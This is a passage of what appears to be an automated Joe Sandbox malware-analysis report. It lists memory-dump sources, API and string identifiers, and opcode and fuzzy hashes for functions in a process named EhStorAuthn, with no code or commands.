                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: b1f695ca8b3afb5641531305417b1361c78e2345ad899842ab5fa21e08d57348
                                                                          • Instruction ID: 6d7be05a11df1e9d0a6fde8911bb1144611b81b3ce3ad797d959fc6aff0ceb55
                                                                          • Opcode Fuzzy Hash: b1f695ca8b3afb5641531305417b1361c78e2345ad899842ab5fa21e08d57348
                                                                          • Instruction Fuzzy Hash: 723157726001199FDB20DE2DDC44BEE77B8EB44715F444999E849E3240EB30BA449BE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $9*3$%/"7$&oc!$1$oc'&
                                                                          • API String ID: 0-1518895095
                                                                          • Opcode ID: e6d4001b669c5ae3269d421f33cedbb8c22a1f39d03d69a72f98afb3799690fb
                                                                          • Instruction ID: fa2df782379944123f23bbbf78c4e0cf944124693b129ff32d070e95074603da
                                                                          • Opcode Fuzzy Hash: e6d4001b669c5ae3269d421f33cedbb8c22a1f39d03d69a72f98afb3799690fb
                                                                          • Instruction Fuzzy Hash: 03F0E93001C7885BCB0DAF14D85599AB6E5FFC9349F80175DF889DB241EB75D2448B4A
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: d46f515fa490c38764340a0bf61bae48a0933a84eb5b0ada831b9b897d16f393
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: DE916371E0021BDBDB28DE69C8C16BEB7A5AF44721F54451EE855EB3C0EF30A9818F61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 1a64606db16b880fe76b4619a611ff9dd88b859451f9538da0db5cc67a449b44
                                                                          • Instruction ID: 4b2fa210ced34eca4878cec873ba3484df827af8f39b804d2f10f03aafdbfebb
                                                                          • Opcode Fuzzy Hash: 1a64606db16b880fe76b4619a611ff9dd88b859451f9538da0db5cc67a449b44
                                                                          • Instruction Fuzzy Hash: D3812EB1D002699BDB31DF54CD48BEAB7B8AB48714F0046DAEA09B7740E7306E84DF60